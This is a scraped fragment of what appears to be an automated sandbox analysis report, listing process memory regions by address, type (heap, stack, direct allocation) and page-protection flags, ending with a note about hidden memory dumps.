heap
|
page read and write
|
||
2032F0C0000
|
heap
|
page read and write
|
||
2FAE000
|
stack
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
1490000
|
unkown
|
page execute and write copy
|
||
C34000
|
heap
|
page read and write
|
||
1670000
|
direct allocation
|
page read and write
|
||
6AE000
|
unkown
|
page execute and read and write
|
||
6BCE000
|
stack
|
page read and write
|
||
45F0000
|
direct allocation
|
page read and write
|
||
3F5F000
|
stack
|
page read and write
|
||
5470000
|
direct allocation
|
page execute and read and write
|
||
4601000
|
heap
|
page read and write
|
||
481F000
|
stack
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
449E000
|
stack
|
page read and write
|
||
1F05000
|
heap
|
page read and write
|
||
1EA2D3B0000
|
trusted library allocation
|
page read and write
|
||
864000
|
unkown
|
page execute and read and write
|
||
1504000
|
heap
|
page read and write
|
||
67C000
|
stack
|
page read and write
|
||
26810966000
|
heap
|
page read and write
|
||
C80000
|
unkown
|
page readonly
|
||
4E61000
|
heap
|
page read and write
|
||
566B000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
DFE000
|
unkown
|
page execute and write copy
|
||
567D000
|
trusted library allocation
|
page read and write
|
||
4E61000
|
heap
|
page read and write
|
||
79584FD000
|
stack
|
page read and write
|
||
3E6F000
|
stack
|
page read and write
|
||
1EA2D3B0000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
46E0000
|
direct allocation
|
page read and write
|
||
7A70000
|
heap
|
page read and write
|
||
15F0000
|
heap
|
page read and write
|
||
7790000
|
direct allocation
|
page execute and read and write
|
||
5A3C000
|
stack
|
page read and write
|
||
450E000
|
stack
|
page read and write
|
||
1F0F000
|
heap
|
page read and write
|
||
17CF000
|
heap
|
page read and write
|
||
7FF6BDA61000
|
unkown
|
page readonly
|
||
4CB0000
|
direct allocation
|
page execute and read and write
|
||
1E3657E8000
|
heap
|
page read and write
|
||
5BCF000
|
stack
|
page read and write
|
||
17A2000
|
heap
|
page read and write
|
||
77F0000
|
direct allocation
|
page execute and read and write
|
||
3C4E000
|
stack
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
569B000
|
trusted library allocation
|
page read and write
|
||
568F000
|
trusted library allocation
|
page read and write
|
||
1670000
|
direct allocation
|
page read and write
|
||
409F000
|
stack
|
page read and write
|
||
4B80000
|
direct allocation
|
page read and write
|
||
568F000
|
trusted library allocation
|
page read and write
|
||
4601000
|
heap
|
page read and write
|
||
7FF68FAFA000
|
unkown
|
page write copy
|
||
26810A06000
|
heap
|
page read and write
|
||
2DDF000
|
stack
|
page read and write
|
||
5670000
|
trusted library allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
17A1000
|
heap
|
page read and write
|
||
950000
|
direct allocation
|
page read and write
|
||
4C60000
|
direct allocation
|
page execute and read and write
|
||
7011000
|
heap
|
page read and write
|
||
1670000
|
direct allocation
|
page read and write
|
||
1762000
|
heap
|
page read and write
|
||
421E000
|
stack
|
page read and write
|
||
47F0000
|
trusted library allocation
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
46E0000
|
direct allocation
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1780000
|
heap
|
page read and write
|
||
26810A06000
|
heap
|
page read and write
|
||
17A1000
|
heap
|
page read and write
|
||
341F000
|
stack
|
page read and write
|
||
345E000
|
stack
|
page read and write
|
||
1E36584F000
|
heap
|
page read and write
|
||
1D566ACA000
|
heap
|
page read and write
|
||
4C10000
|
direct allocation
|
page execute and read and write
|
||
7FF69F040000
|
unkown
|
page readonly
|
||
151000
|
unkown
|
page execute and write copy
|
||
7070000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
D13000
|
heap
|
page read and write
|
||
445F000
|
stack
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
398F000
|
stack
|
page read and write
|
||
4BC2000
|
direct allocation
|
page read and write
|
||
3D1E000
|
stack
|
page read and write
|
||
4595000
|
heap
|
page read and write
|
||
D8D000
|
heap
|
page read and write
|
||
396F000
|
stack
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
1D54000
|
heap
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
1E365818000
|
heap
|
page read and write
|
||
382000
|
unkown
|
page execute and read and write
|
||
1868D8D0000
|
heap
|
page read and write
|
||
45F0000
|
direct allocation
|
page read and write
|
||
3000000
|
direct allocation
|
page read and write
|
||
15CC000
|
heap
|
page read and write
|
||
2006EC70000
|
trusted library allocation
|
page read and write
|
||
C34000
|
heap
|
page read and write
|
||
C80000
|
unkown
|
page readonly
|
||
552E000
|
stack
|
page read and write
|
||
47AF6FC000
|
stack
|
page read and write
|
||
24DE000
|
stack
|
page read and write
|
||
1E365820000
|
heap
|
page read and write
|
||
3B0F000
|
stack
|
page read and write
|
||
36DE000
|
stack
|
page read and write
|
||
7011000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
69EF000
|
stack
|
page read and write
|
||
1AB4BCA5000
|
heap
|
page read and write
|
||
409F000
|
stack
|
page read and write
|
||
4ADE000
|
stack
|
page read and write
|
||
449E000
|
stack
|
page read and write
|
There are 2927 hidden memdumps, click here to show them.